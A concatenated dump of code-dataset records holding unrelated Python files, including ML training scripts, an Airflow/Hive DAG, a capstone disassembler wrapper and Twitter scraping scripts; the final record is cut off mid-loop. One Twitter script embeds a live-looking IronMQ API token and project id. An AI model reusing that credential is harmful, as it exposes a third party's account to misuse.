argparse.ArgumentParser(description='UCF101 spatial stream on resnet101')\nparser.add_argument('--epochs', default=2, type=int, metavar='N', help='number of total epochs')\nparser.add_argument('--batch-size', default=16, type=int, metavar='N', help='mini-batch size (default: 25)')\nparser.add_argument('--lr', default=5e-4, type=float, metavar='LR', help='initial learning rate')\nparser.add_argument('--evaluate', dest='evaluate', action='store_true', help='evaluate model on validation set')\nparser.add_argument('--resume', default='', type=str, metavar='PATH', help='path to latest checkpoint (default: none)')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N', help='manual epoch number (useful on restarts)')\n\ndef main():\n global arg\n arg = parser.parse_args()\n print(arg)\n\n #Prepare DataLoader\n data_loader = spatial_dataloader(\n BATCH_SIZE=arg.batch_size,\n # 进程数量\n num_workers=8,\n path='/home/yzy20161103/csce636project/two-stream-action-recognition/video_data/',\n ucf_list ='/home/yzy20161103/csce636project/two-stream-action-recognition/UCF_list/',\n ucf_split ='01', \n )\n \n train_loader, test_loader, test_video = data_loader.run()\n #Model \n model = Spatial_CNN(\n nb_epochs=arg.epochs,\n lr=arg.lr,\n batch_size=arg.batch_size,\n resume=arg.resume,\n start_epoch=arg.start_epoch,\n evaluate=arg.evaluate,\n test_loader=test_loader,\n test_video=test_video\n )\n #Training\n model.run()\n\nclass Spatial_CNN():\n def __init__(self, nb_epochs, lr, batch_size, resume, start_epoch, evaluate, test_loader, test_video):\n self.nb_epochs=nb_epochs\n self.lr=lr\n self.batch_size=batch_size\n self.resume=resume\n self.start_epoch=start_epoch\n self.evaluate=evaluate\n self.test_loader=test_loader\n self.best_prec1=0\n self.test_video=test_video\n\n def build_model(self):\n print ('==> Build model and setup loss and optimizer')\n #build model\n self.model = resnet101(pretrained= True, channel=3).cuda()\n #Loss function and optimizer\n self.criterion = nn.CrossEntropyLoss().cuda()\n self.optimizer = torch.optim.SGD(self.model.parameters(), self.lr, momentum=0.9)\n self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', patience=1,verbose=True)\n \n def resume_and_evaluate(self):\n if self.resume:\n if os.path.isfile(self.resume):\n print(\"==> loading checkpoint '{}'\".format(self.resume))\n checkpoint = torch.load(self.resume)\n self.start_epoch = checkpoint['epoch']\n self.best_prec1 = checkpoint['best_prec1']\n self.model.load_state_dict(checkpoint['state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"==> loaded checkpoint '{}' (epoch {}) (best_prec1 {})\"\n .format(self.resume, checkpoint['epoch'], self.best_prec1))\n else:\n print(\"==> no checkpoint found at '{}'\".format(self.resume))\n if self.evaluate:\n self.epoch = 0\n prec1, val_loss = self.validate_1epoch()\n return\n\n def run(self):\n self.build_model()\n self.resume_and_evaluate()\n \n\n def validate_1epoch(self):\n print('==> Epoch:[{0}/{1}][validation stage]'.format(self.epoch, self.nb_epochs))\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n # switch to evaluate mode\n self.model.eval()\n self.dic_video_level_preds={}\n end = time.time()\n progress = tqdm(self.test_loader)\n with torch.no_grad():\n for i, (keys,data,label) in enumerate(progress):\n \n label = label.cuda()\n data = data.cuda()\n\n # compute output\n output = self.model(data)\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n #Calculate video level prediction\n preds = output.data.cpu().numpy()\n nb_data = preds.shape[0]\n for j in range(nb_data):\n videoName = keys[j].split('/',1)[0]\n if videoName not in self.dic_video_level_preds.keys():\n self.dic_video_level_preds[videoName] = preds[j,:]\n else:\n self.dic_video_level_preds[videoName] += preds[j,:]\n print(self.dic_video_level_preds)\n video_top1, video_loss = self.frame2_video_level_accuracy()\n \n \n info = {'Epoch':[self.epoch],\n 'Batch Time':[round(batch_time.avg,3)],\n 'Loss':[np.round(video_loss,5)],\n 'Prec@1':[np.round(video_top1,3)]}\n #record_info(info, 'record/spatial/rgb_test.csv','test')\n return video_top1, video_loss\n\n def frame2_video_level_accuracy(self):\n \n correct = 0\n video_level_preds = np.zeros((len(self.dic_video_level_preds),2))\n video_level_labels = np.zeros(len(self.dic_video_level_preds))\n ii=0\n for name in sorted(self.dic_video_level_preds.keys()):\n \n preds = self.dic_video_level_preds[name]\n label = int(self.test_video[name])-1\n \n video_level_preds[ii,:] = preds\n video_level_labels[ii] = label\n ii+=1 \n if np.argmax(preds) == (label):\n correct+=1\n\n video_level_labels = torch.from_numpy(video_level_labels).long()\n video_level_preds = torch.from_numpy(video_level_preds).float()\n \n top1 = accuracy(video_level_preds, video_level_labels, topk=(1,))\n loss = self.criterion(Variable(video_level_preds).cuda(), Variable(video_level_labels).cuda()) \n \n top1 = float(top1[0].numpy())\n \n #print(' * Video level Prec@1 {top1:.3f}, Video level Prec@5 {top5:.3f}'.format(top1=top1, top5=top5))\n return top1,loss.data.cpu().numpy()\n\n\n\n\n\n\n\nif __name__=='__main__':\n main()\n","sub_path":"test_spatial_cnn.py","file_name":"test_spatial_cnn.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"41472182","text":"from keras.layers import Dropout, Flatten, Dense\nfrom keras.models import Model\nfrom keras.applications.vgg16 import VGG16\n\nwidth = 224\nheight = 224\nvgg16_no_dense = VGG16(include_top=False, weights='imagenet', input_shape=(width, height, 3))\n\nmodel = Flatten(name=\"flatten\")(vgg16_no_dense.output)\nmodel = Dense(4096, activation='relu', name='fc1')(model)\nmodel = Dense(4096, activation='relu', name='fc2')(model)\nmodel = Dropout(0.5)(model)\n\nmodel = Dense(1,activation='sigmoid')(model)\nmodel_vgg = Model(vgg16_no_dense.input, model, name='vgg16')\n\nmodel_vgg.summary()\n","sub_path":"keras/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"28511269","text":"from leveleditorlibs import tool, resources, graphics, draw, level\n\nclass PlayerStart(tool.Tool):\n def start_drawing(self, x, y):\n level.player_x = x\n level.player_y = y\n \n def stop_drawing(self, x, y):\n self.start_drawing(x,y)\n \n def keep_drawing(self, x, y, dx, dy):\n level.player_x = x\n level.player_y = y\n\ndefault = PlayerStart()\npriority = 1\ngroup = 'Events'\nimage = resources.PlayerStart\ncursor = graphics.cursor['CURSOR_DEFAULT']\n","sub_path":"Editor/Tools/PlayerStart.py","file_name":"PlayerStart.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"567113297","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport csv\nimport re\nimport unicodedata\nimport string\nimport logging\n\nimport io_files\n\n\nlogger = logging.getLogger(\"Clean Data\")\nlogger.setLevel(logging.INFO)\n\n\ndef description(product):\n return product[4]\n\n\ndef libelle(product):\n return product[5]\n\n\nshortword = re.compile(r'\\W*\\b\\w{1,3}\\b')\n\n\ndef remove_shortwords(s):\n return shortword.sub('', s)\n\n\ndef remove_accents(s):\n unicode_string = s.decode('utf-8')\n nkfd_form = unicodedata.normalize('NFKD', unicode_string)\n return u\"\".join([c.encode('ascii', 'ignore') for c in nkfd_form if not unicodedata.combining(c)])\n\n\ndef clearup(s):\n s = re.sub('[%s]' % '-', '', s)\n return re.sub('[%s]' % string.punctuation, ' ', s)\n\n\npattern = re.compile(r'\\d')\n\n\ndef remove_numbers(s):\n if pattern.findall(s):\n s += \" XXXX\"\n return re.sub(\"[a-z]*[0-9]+[a-z0-9]*\", '', s)\n\n\ndef remove_spaces(s):\n return re.sub(' +', ' ', s).strip()\n\n\nstop_words_set = set(remove_accents(line.strip()) for line in open(io_files.stopwords_path))\n\n\ndef remove_stopwords(s):\n words = s.split()\n res = \"\"\n for w in words:\n if not (w in stop_words_set):\n res += w + \" \"\n return res\n\n\ndef clean_string(s):\n s = s.lower()\n s = remove_accents(s)\n s = clearup(s)\n s = remove_numbers(s)\n s = remove_shortwords(s)\n s = remove_stopwords(s)\n s = remove_spaces(s)\n return s.lower()\n\n\ndef clean_product(product):\n pre_columns = [product[i] for i in xrange(4)]\n post_columns = [product[i] for i in xrange(6, 8)]\n\n cleaned_description = clean_string(description(product))\n cleaned_libelle = clean_string(libelle(product))\n# cleaned_marque = clean_string(marque(product))\n\n return pre_columns + [cleaned_description, cleaned_libelle] + post_columns\n\n\ndef clean_data(source_path, dest_path):\n\n \"\"\"\n\n :type dest_path:utf8\n \"\"\"\n\n logger.info(\"Clean data start\")\n\n with open(dest_path, 'wb') as dest:\n writer = csv.writer(dest, delimiter=';')\n\n with open(source_path, 'r') as f:\n reader = csv.reader(f, delimiter=\";\")\n\n for product in reader:\n cleaned = clean_product(product)\n writer.writerow(cleaned)\n\n logger.info(\"Clean data end\")\n\n# clean_data(\"working_data.csv\", \"clean_data.csv\")\n\n# clean_data(io_files.shuffle_path, io_files.clean_path)\n\n# s =\"Veste peak Moutain New collection - Peak Mountain ·êß Veste matelassée pour femmes, résistant au froid, résistant\n# à la neige, résistant à la pluie léger et résistant ·êß - cap… Voir la présentation\"\n\n# print clean_string(s)\n","sub_path":"CDiscount/src/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"311056210","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ArmRollingUpgradeMonitoringPolicy(Model):\n \"\"\"The policy used for monitoring the application upgrade.\n\n :param failure_action: The activation Mode of the service package.\n Possible values include: 'Rollback', 'Manual'\n :type failure_action: str or\n ~azure.mgmt.servicefabric.models.ArmUpgradeFailureAction\n :param health_check_wait_duration: The amount of time to wait after\n completing an upgrade domain before applying health policies. It is first\n interpreted as a string representing an ISO 8601 duration. If that fails,\n then it is interpreted as a number representing the total number of\n milliseconds.\n :type health_check_wait_duration: str\n :param health_check_stable_duration: The amount of time that the\n application or cluster must remain healthy before the upgrade proceeds to\n the next upgrade domain. It is first interpreted as a string representing\n an ISO 8601 duration. If that fails, then it is interpreted as a number\n representing the total number of milliseconds.\n :type health_check_stable_duration: str\n :param health_check_retry_timeout: The amount of time to retry health\n evaluation when the application or cluster is unhealthy before\n FailureAction is executed. It is first interpreted as a string\n representing an ISO 8601 duration. If that fails, then it is interpreted\n as a number representing the total number of milliseconds.\n :type health_check_retry_timeout: str\n :param upgrade_timeout: The amount of time the overall upgrade has to\n complete before FailureAction is executed. It is first interpreted as a\n string representing an ISO 8601 duration. If that fails, then it is\n interpreted as a number representing the total number of milliseconds.\n :type upgrade_timeout: str\n :param upgrade_domain_timeout: The amount of time each upgrade domain has\n to complete before FailureAction is executed. It is first interpreted as a\n string representing an ISO 8601 duration. If that fails, then it is\n interpreted as a number representing the total number of milliseconds.\n :type upgrade_domain_timeout: str\n \"\"\"\n\n _attribute_map = {\n 'failure_action': {'key': 'failureAction', 'type': 'str'},\n 'health_check_wait_duration': {'key': 'healthCheckWaitDuration', 'type': 'str'},\n 'health_check_stable_duration': {'key': 'healthCheckStableDuration', 'type': 'str'},\n 'health_check_retry_timeout': {'key': 'healthCheckRetryTimeout', 'type': 'str'},\n 'upgrade_timeout': {'key': 'upgradeTimeout', 'type': 'str'},\n 'upgrade_domain_timeout': {'key': 'upgradeDomainTimeout', 'type': 'str'},\n }\n\n def __init__(self, *, failure_action=None, health_check_wait_duration: str=None, health_check_stable_duration: str=None, health_check_retry_timeout: str=None, upgrade_timeout: str=None, upgrade_domain_timeout: str=None, **kwargs) -> None:\n super(ArmRollingUpgradeMonitoringPolicy, self).__init__(**kwargs)\n self.failure_action = failure_action\n self.health_check_wait_duration = health_check_wait_duration\n self.health_check_stable_duration = health_check_stable_duration\n self.health_check_retry_timeout = health_check_retry_timeout\n self.upgrade_timeout = upgrade_timeout\n self.upgrade_domain_timeout = upgrade_domain_timeout\n","sub_path":"sdk/servicefabric/azure-mgmt-servicefabric/azure/mgmt/servicefabric/models/arm_rolling_upgrade_monitoring_policy_py3.py","file_name":"arm_rolling_upgrade_monitoring_policy_py3.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"362542706","text":"import sys\nimport argparse\n\nimport yaml\n\nfrom utils.trainer import Trainer\n\n\nDESCRIPTION = \"\"\"Train and evaluate a BERT for address extraction model.\"\"\"\n\n\ndef main(args):\n with open(args.config_path, \"r\") as conf:\n config = yaml.load(conf, Loader=yaml.FullLoader)\n config[\"action\"] = \"training\"\n config[\"resume_from\"] = args.resume_from\n config[\"load_from\"] = args.load_from\n config[\"config_path\"] = args.config_path\n\n # Initializer trainer\n trainer = Trainer(config)\n\n # Start training\n trainer.train()\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=DESCRIPTION)\n parser.add_argument(\n '-c', '--config-path', type=str, required=True,\n help='Path to full config.')\n parser.add_argument(\n '-r', '--resume-from', type=str, required=False, default=None,\n help='Directory to resume from.')\n parser.add_argument(\n '-l', '--load-from', type=str, required=False, default=None,\n help='Path to pretrained model to load from.')\n\n return parser.parse_args(argv)\n\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"602104692","text":"import os\nimport json\nimport numpy as np\n\n\ndef json2txt(path_json, path_txt):\n with open(path_json, 'r', encoding='gb18030') as path_json:\n jsonx = json.load(path_json)\n with open(path_txt, 'w+') as ftxt:\n for shape in jsonx['shapes']:\n xy = np.array(shape['points'])\n # label=str(shape['label'])\n strxy = []\n for m, n in xy:\n strxy.append(str(m) + ',' + str(n))\n # strxy+=str(m)+','+str(n)+','\n # strxy+=label\n ftxt.writelines(','.join(strxy) + \"\\n\")\n\n\ndir_json = r'F:\\ServerSpace\\labelfile\\labels' # json路径\ndir_txt = r'F:\\ServerSpace\\labelfile\\txt' # 存取的txt路径\nif not os.path.exists(dir_txt):\n os.makedirs(dir_txt)\nlist_json = os.listdir(dir_json)\nfor cnt, json_name in enumerate(list_json):\n print('cnt=%d,name=%s' % (cnt, json_name))\n path_json = os.path.join(dir_json, json_name)\n path_txt = dir_txt + json_name.replace('.json', '.txt')\n # print(path_json, path_txt)\n json2txt(path_json, path_txt)\n","sub_path":"TargetDetection/jb/json-txt.py","file_name":"json-txt.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"174009782","text":"from Project_Euler import factors\r\nfrom time import time\r\n\r\n\r\ndef get_lens(x):\r\n return [1 + i for i in factors(2**x - 1)]\r\n\r\n\r\ndef get_mins(x):\r\n lower_mins = set()\r\n t1 = time()\r\n for i in range(1, x):\r\n lower_mins = lower_mins.union(set(get_lens(i)))\r\n print(f'got {i} in {time()-t1} s')\r\n return set(get_lens(x)).difference(lower_mins)\r\n\r\n\r\nprint(sum(get_mins(60)))","sub_path":"PE622.py","file_name":"PE622.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"247169116","text":"import logging\nfrom datetime import timedelta\n\nfrom airflow import DAG, macros\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.hive_operator import HiveOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils import timezone\n\nimport pandas as pd\n\n\ndefault_args = {\n 'owner': 'zkan',\n 'email': ['zkan@hey.com'],\n 'sla': timedelta(seconds=30),\n}\ndag = DAG(\n 'transaction_load_pipeline',\n schedule_interval='0 0 * * THU', # We can then use {{ macros.ds_add(ds, -1) }}\n default_args=default_args,\n start_date=timezone.datetime(2009, 1, 1),\n catchup=False,\n)\n\nstart = DummyOperator(\n task_id='start',\n dag=dag,\n)\n\nDATA_FOLDER = '/usr/local/airflow/dags/files'\n\ndef query_data_by_week_end_date_func(ds):\n week_end_date = macros.ds_format(ds, '%Y-%m-%d', '%d-%b-%y')\n\n df = pd.read_csv(f'{DATA_FOLDER}/transaction-data-table.csv', header=1)\n new_df = df[df.WEEK_END_DATE == week_end_date]\n new_df.to_csv(f'{DATA_FOLDER}/transaction-{ds}.csv', index=False, header=True)\n \n\n# Query data by week end date\nquery_data_by_week_end_date = PythonOperator(\n task_id='query_data_by_week_end_date',\n python_callable=query_data_by_week_end_date_func,\n op_args=['{{ macros.ds_add(ds, -1) }}'],\n dag=dag,\n)\n\n# Remove empty columns\ndef remove_empty_columns_func(ds):\n df = pd.read_csv(f'{DATA_FOLDER}/transaction-{ds}.csv')\n logging.info(df.head())\n df[\n [\n 'WEEK_END_DATE', \n 'STORE_NUM', \n 'UPC', \n 'UNITS', \n 'VISITS', \n 'HHS', \n 'SPEND', \n 'PRICE', \n 'BASE_PRICE', \n 'FEATURE', \n 'DISPLAY', \n 'TPR_ONLY'\n ]\n ].to_csv(f'{DATA_FOLDER}/transaction-cleaned-{ds}.csv', index=False, header=False)\n\n\nremove_empty_columns = PythonOperator(\n task_id='remove_empty_columns',\n python_callable=remove_empty_columns_func,\n op_args=['{{ macros.ds_add(ds, -1) }}'],\n dag=dag,\n)\n\n# Upload to HDFS\nupload_to_hdfs = BashOperator(\n task_id='upload_to_hdfs',\n bash_command=f'hdfs dfs -put -f {DATA_FOLDER}/transaction-cleaned-{{{{ macros.ds_add(ds, -1) }}}}.csv /transaction-cleaned-{{{{ macros.ds_add(ds, -1) }}}}.csv',\n dag=dag,\n)\n\n# Create Hive table with partition\ncreate_transations_table = HiveOperator(\n task_id='create_transations_table',\n hive_cli_conn_id='my_hive_conn',\n hql='''\n CREATE TABLE IF NOT EXISTS fact_transactions (\n week_end_date VARCHAR(40),\n store_num INT,\n upc VARCHAR(100),\n units INT,\n visits INT,\n hhs INT,\n spend DECIMAL(38, 2),\n price DECIMAL(38, 2),\n base_price DECIMAL(38, 2),\n feature INT,\n display INT,\n tpr_only INT\n )\n PARTITIONED BY (execution_date DATE)\n ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n'\n STORED AS TEXTFILE;\n ''',\n dag=dag,\n)\n\n# Load data in Hive table with partition\nload_data_to_hive_table = HiveOperator(\n task_id='load_data_to_hive_table',\n hive_cli_conn_id='my_hive_conn',\n hql='''\n LOAD DATA INPATH '/transaction-cleaned-{{ macros.ds_add(ds, -1) }}.csv' OVERWRITE INTO TABLE fact_transactions PARTITION (execution_date=date'{{ macros.ds_add(ds, -1) }}');\n ''',\n dag=dag,\n)\n\nend = DummyOperator(\n task_id='end',\n dag=dag,\n)\n\n# Define DAG dependencies\nstart >> query_data_by_week_end_date >> remove_empty_columns >> upload_to_hdfs >> create_transations_table >> load_data_to_hive_table >> end\n","sub_path":"mnt/airflow/dags/transaction_load_pipeline.py","file_name":"transaction_load_pipeline.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"517737053","text":"\"\"\"\n@Author: Brandon Miller (riftworm)\n@Email: brandonkentmiller@gmail.com\n\"\"\"\n\nfrom capstone import *\n\nclass ASM():\n def __init__(self, archstr, emstr = None):\n \"\"\"\n Basic constructor\n \"\"\"\n self.proc, self.mode = self._get_arch(archstr)\n if emstr != None:\n self.mode += self._get_extra_mode(emstr)\n\n def _get_arch(self, archstr):\n \"\"\"\n Get disassembler mode from user supplied mode string\n \"\"\"\n if archstr == \"x86\":\n return [CS_ARCH_X86, CS_MODE_32]\n elif archstr == \"x8664\" or archstr == \"x86-64\":\n return [CS_ARCH_X86, CS_MODE_64]\n elif archstr == \"x8616\" or archstr == \"x86-16\":\n return [CS_ARCH_X86, CS_MODE_16]\n elif archstr == \"arm\":\n return [CS_ARCH_ARM, CS_MODE_ARM]\n elif archstr == \"thumb\":\n return [CS_ARCH_ARM, CS_MODE_THUMB]\n elif archstr == \"arm64\" or archstr == \"arm-64\":\n return [CS_ARCH_ARM64, CS_MODE_ARM]\n elif archstr == \"mips\":\n return [CS_ARCH_MIPS, CS_MODE_MIPS32]\n elif archstr == \"mips64\":\n return [CS_ARCH_MIPS, CS_MODE_MIPS64]\n elif archstr == \"mipsr6\" or archstr == \"mips32r6\":\n return [CS_ARCH_MIPS, CS_MODE_MIPS32R6]\n elif archstr == \"ppc\":\n return [CS_ARCH_PPC, CS_MODE_32]\n elif archstr == \"ppc64\" or archstr == \"ppc-64\":\n return [CS_ARCH_PPC, CS_MODE_64]\n else:\n return [None, None]\n\n def _get_extra_mode(self, emstr):\n \"\"\"\n Get extra mode specifier from supplied string\n \"\"\"\n if emstr == \"le\" or emstr == \"little\":\n return CS_MODE_LITTLE_ENDIAN\n elif emstr == \"be\" or emstr == \"big\":\n return CS_MODE_BIG_ENDIAN\n elif emstr == \"micro\":\n return CS_MODE_MICRO\n elif emstr == \"mclass\":\n return CS_MODE_MCLASS\n elif emstr == \"v8\":\n return CS_MODE_V8\n else:\n raise Exception('Unknown Extra Mode', 'invalid extra mode string supplied')\n\n def disasm(self, buf, offset = 0x00):\n \"\"\"\n Disassembles a buffer of data based on supplied architecture\n \"\"\"\n md = Cs(self.proc, self.mode)\n for (address, size, mnemonic, opstr) in md.disasm_lite(buf, offset):\n print(\"0x{0}:\\t{1}\\t{2}\".format(address, mnemonic, opstr))\n","sub_path":"talon/asm.py","file_name":"asm.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"16754654","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 25 11:08:55 2019\r\n\r\n@author: user\r\n\"\"\"\r\n\r\n# exception handling is important\r\n# standard suspects are div by zero, io error\r\ntry:\r\n x = 1\r\n y = 0\r\n x/y\r\nexcept ZeroDivisionError:\r\n print(\"Divide by Zero ! Huh\")\r\n# What do you get when you try to add Srini ti a complex number\r\n# type error offcourse , because Srini is not a complex guy\r\nx = \"Jamie\"\r\ntry:\r\n y = 2 + 2j\r\n p = x + y\r\n #print(p)\r\nexcept TypeError:\r\n print(\"mismatch in your type\")\r\n# and a exception to catch all situations\r\ntry:\r\n x = \"Marie\"\r\n y = 2 + 2j\r\n x/y\r\n print(\"hello world\")\r\nexcept ZeroDivisionError:\r\n print(\"Divide by Zero ! Huh\")\r\nexcept:\r\n print(\"Will catch all other errors\")\r\nfinally:\r\n print(\"Will exceute no matter what\")\r\n# Exercise try and find the type of error that happens programmatically\r\n# example x=\"rama\" y=\"zero\" and x/y , print the error\r\n# This is a type error because Allah/Rama/Christ can never be Zero\r\ntry:\r\n x=\"Rama\"\r\n y=\"Zero\"\r\n x/y\r\nexcept Exception as ex:\r\n print(type(ex).__name__)\r\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n print(message)\r\n# how can we raise exceptions programmatically and defining custom exceptions\r\n# I can define my own custome exceptions\r\n# By inheriting a class of type exception\r\nclass CustomException(Exception):\r\n def __init__(self, value):\r\n self.parameter = value\r\n def __str__(self):\r\n # repr only does a string representation of the object\r\n return repr(self.parameter)\r\ntry:\r\n raise CustomException(\"My Useful Error Message\")\r\nexcept CustomException as ex :\r\n print(type(ex).__name__)\r\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n print(message)\r\n print (\"Caught: custom exception\")\r\n# Dukan Bandh ... Picture to bake hey \r\n\r\n","sub_path":"day1/d1p3.py","file_name":"d1p3.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"440841549","text":"from django.db import models\nfrom tastypie.authentication import ApiKeyAuthentication\nfrom tastypie.authorization import Authorization,DjangoAuthorization\nfrom accounts.models import MyProfile\nfrom django.contrib.auth.models import User\nfrom tastypie.resources import ModelResource\n\nclass UserResource(ModelResource):\n class Meta:\n queryset = User.objects.all()\n resource_name= 'user_info'\n list_allowed_methods = ['get', 'post']\n fields = ['email','first_name','last_name']\n include_resource_uri = False\n #excludes = ['email', 'password', 'is_active', 'is_staff', 'is_superuser']\n authentication = ApiKeyAuthentication()\n authorization = DjangoAuthorization()\n filtering = {\n 'username':[ 'exact', ]\n }\n\n def authorized_read_list(self, object_list, bundle):\n return object_list.filter(username=bundle.request.user)\n","sub_path":"accounts/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"600358855","text":"# COMMAND LINE APP TO SCRAPE TWITTER TEETS\n\nimport json\nimport logging\nimport tweepy\nimport argparse\nimport collections\nimport datetime as dt\nfrom os.path import isfile\nfrom twitterscraper.query import query_tweets\n\n\ndef getKeys():\n file = open(\"twitterkey.txt\",\"r\") #opens key for Twitter API\n consumerKey = file.readline().rstrip(\"\\n\")\n consumerSecret = file.readline().rstrip(\"\\n\")\n accessToken = file.readline().rstrip(\"\\n\")\n accessTokenSecret = file.readline().rstrip(\"\\n\")\n\t#reads file to get assigned values\n file.close()\n return consumerKey,consumerSecret,accessToken,accessTokenSecret\n\nclass TwitterAPI():\n # Initiating info for Twitter API\n def __init__(self):\n\n self.consumerKey,self.consumerSecret,self.accessToken,self.accessTokenSecret = getKeys()\n\n auth = tweepy.OAuthHandler(self.consumerKey, self.consumerSecret)\n auth.set_access_token(self.accessToken,self.accessTokenSecret)\n self.api = tweepy.API(auth)\n\n # Call this with a query to get results\n\n def getTweets(self,query):\n tweets = self.api.search(q=query,count = 10,show_user = True,include_entities=True)\n users = []\n print (tweets)\n for tweet in tweets:\n\t\t\n\t\t#creates array and adds search info to it\n\n user = []\n user.append(tweet.user.name)\n user.append(tweet.user.screen_name)\n user.append(tweet.created_at)\n user.append(tweet.text)\n users.append(user)\n\n return users\n\nclass JSONEncoder(json.JSONEncoder):\n def default(self, obj):\n if hasattr(obj, '__json__'):\n return obj.__json__()\n elif isinstance(obj, collections.Iterable):\n return list(obj)\n elif isinstance(obj, dt.datetime):\n return obj.isoformat()\n elif hasattr(obj, '__getitem__') and hasattr(obj, 'keys'):\n return dict(obj)\n elif hasattr(obj, '__dict__'):\n return {member: getattr(obj, member)\n for member in dir(obj)\n if not member.startswith('_') and\n not hasattr(getattr(obj, member), '__call__')}\n\n return json.JSONEncoder.default(self, obj)\n\n# Date format validation\n\ndef valid_date(s):\n try:\n return dt.datetime.strptime(s, \"%Y-%m-%d\").date()\n except ValueError:\n msg = \"Not a valid date: '{0}'.\".format(s)\n raise argparse.ArgumentTypeError(msg)\n\ndef main():\n logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n try:\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,\n description=__doc__\n )\n\n parser.add_argument(\"query\", type=str)\n parser.add_argument(\"-o\", \"--output\", type=str, default=\"tweets.json\")\n parser.add_argument(\"-l\", \"--limit\", type=int, default=None)\n parser.add_argument(\"-a\", \"--all\", action='store_true')\n parser.add_argument(\"--lang\", type=str, default=None)\n parser.add_argument(\"-d\", \"--dump\", action=\"store_true\")\n parser.add_argument(\"-bd\", \"--begindate\", type=valid_date, default=\"2017-01-01\", metavar='\\b')\n parser.add_argument(\"-ed\", \"--enddate\", type=valid_date, default=dt.date.today(), metavar='\\b')\n\t\t#adds information for collection \n args = parser.parse_args()\n\n if isfile(args.output) and not args.dump:\n logging.error(\"Output file exits. Aborting!\")\n exit(-1)\n \n if args.all:\n args.begindate = dt.date(2007,3,1)\n\n tweets = query_tweets(query = args.query, limit = args.limit, \n begindate = args.begindate, enddate = args.enddate, \n poolsize = args.poolsize, lang = args.lang)\n\n if args.dump:\n print(json.dumps(tweets, cls=JSONEncoder))\n else:\n if tweets:\n with open(args.output, \"w\") as output:\n json.dump(tweets, output, cls=JSONEncoder)\n except KeyboardInterrupt:\n logging.info(\"Program interrupted by user. Quitting...\")\n","sub_path":"twitterapi.py","file_name":"twitterapi.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"288494462","text":"from models import Tweets\nfrom models import RawTokens\nfrom cnf import *\nfrom iron_mq import *\nimport json\nimport tweepy\n\n\nusers = []\nironmq = IronMQ(host='mq-aws-eu-west-1-1.iron.io',\n project_id='5763516ab7409e00071268bd',\n token='_ppJdHd8vlrK9ZsUC4RmoxmoFow',\n protocol='https', port=443,\n api_version=3,\n config_file=None)\n\nq = ironmq.queue('tweets')\nusers = []\n\nfor token in RawTokens.select():\n users.append({\"client\": token.client, \"secret\": token.secret})\n\n\n\n# lastTweet = Tweets.select().order_by(Tweets.id.desc()).get().tid\n\n\nauth = tweepy.OAuthHandler(CONSUMER_TOKEN, CONSUMER_SECRET)\nauth.set_access_token(users[0]['client'], users[0]['secret'])\napi = tweepy.API(auth)\n\nfor update in api.user_timeline(screen_name=FOLLOW_USER,count=5):\n try:\n print(update.id)\n tw = Tweets(tid=update.id,send=\"false\")\n tw.save()\n except Exception as e:\n print(e)\n\nfor update in api.user_timeline(screen_name=\"mariainesandra\",count=5):\n try:\n 